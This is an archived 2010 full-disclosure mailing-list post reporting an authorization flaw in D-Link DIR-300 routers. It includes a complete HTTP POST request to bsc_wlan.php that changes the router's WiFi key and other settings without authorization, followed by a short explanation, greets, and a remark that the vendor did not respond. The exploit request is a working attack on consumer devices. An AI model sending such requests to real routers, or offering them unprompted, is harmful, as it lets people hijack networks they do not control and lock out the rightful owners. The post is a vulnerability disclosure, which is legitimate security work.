[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTimTh+3yAE8XuoDxF1-qoHi+7=ir7FbG7+CtQsTO@mail.gmail.com>
Date: Wed, 24 Nov 2010 13:21:35 +0530
From: naresh jha <rappercrazzy@...il.com>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: D-LINK router vulnerabilities
Hello All,
Here is another D-Link vulnerability where you can change the network Key
(i.e., WEP, WPAx keys).
Requirement:
1. You need to have access to the internal network of that router. The two
scenarios are mentioned below:
Scenario A: You know the network/ WIFI key to connect to the WIFI network
but you may not have administration privilege to the device. Office scenario
Scenario B: You are on wired LAN and the device is also on the LAN, allowing
users to use the WiFi feature/ service.
===Exploit Code===
POST http://192.168.0.1/bsc_wlan.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 320
ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
khuljas%21ms%21m&f_radius_ip1=&f_radius_port1=&f_radius_secret1=
=====End Exploit Code===
*What it does*
The php file in the request allows Internal network systems, i.e., in this
case 192.168.0.0/24, to change the WiFi Key without any authorization. This
will also allow you to change other parameters/ configuration settings of
the device.
Affected Products: DIR-300 (tested) and others
*Greets:*
Friends: Plash, Satyam, int2root
Mentor who inspired me: n2n
Cheers,
Gaurav Saha
P.S I have sent this bug to DLink but never received any response. Hence I
am disclosing the bug to the PUBLIC.
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists